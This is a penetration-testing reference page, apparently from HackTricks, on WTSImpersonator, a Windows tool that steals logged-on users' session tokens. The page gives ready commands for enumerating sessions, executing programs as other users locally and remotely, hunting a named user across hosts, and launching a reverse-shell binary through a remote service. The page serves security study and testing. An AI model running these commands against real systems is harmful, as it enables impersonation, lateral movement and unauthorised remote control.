wts-impersonator.md (2747B)
1 --- 2 title: "WTS Impersonator" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/stealing-credentials/wts-impersonator.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/stealing-credentials/wts-impersonator.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # WTS Impersonator 14 15 **WTSImpersonator**, by Omri Baso, uses Windows Terminal Services APIs exposed through the `\\pipe\LSM_API_service` RPC named pipe to enumerate logged-on sessions and start a process with a selected user's token. It supports local enumeration and execution as well as remote service-based workflows.<sup>[[1]](#references)</sup> 16 17 ## Core functionality 18 19 Its local execution flow uses the following API sequence:<sup>[[1]](#references)[[2]](#references)</sup> 20 21 ```text 22 WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW 23 ``` 24 25 ## Modules and usage 26 27 - **Enumerate users:** The tool can enumerate sessions on the local or a remote host. 28 29 - Locally: 30 ```bash 31 .\WTSImpersonator.exe -m enum 32 ``` 33 - Remotely, specify an IP address or hostname: 34 ```bash 35 .\WTSImpersonator.exe -m enum -s 192.168.40.131 36 ``` 37 38 - **Execute commands:** The `exec` and `exec-remote` modules need a service context. Microsoft documents that `WTSQueryUserToken` requires the caller to run as `LocalSystem` with the `SE_TCB_NAME` privilege.<sup>[[2]](#references)</sup> 39 40 - Local command execution: 41 ```bash 42 .\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe 43 ``` 44 - PsExec can start a `LocalSystem` command prompt for testing: 45 ```bash 46 .\PsExec64.exe -accepteula -s cmd.exe 47 ``` 48 49 - **Remote command execution:** The remote mode creates a service on the target in a PsExec-like workflow and therefore requires rights to install and start that service.<sup>[[1]](#references)</sup> 50 51 - Example: 52 ```bash 53 .\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2 54 ``` 55 56 - **User hunting:** The `user-hunter` module searches a host list for a named user's session and attempts to execute the supplied program in that context.<sup>[[1]](#references)</sup> 57 - Usage example: 58 ```bash 59 .\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe 60 ``` 61 62 ## References 63 64 - [1] [OmriBaso/WTSImpersonator](https://github.com/OmriBaso/WTSImpersonator) 65 - [2] [Microsoft: `WTSQueryUserToken` function](https://learn.microsoft.com/en-us/windows/win32/api/wtsapi32/nf-wtsapi32-wtsqueryusertoken)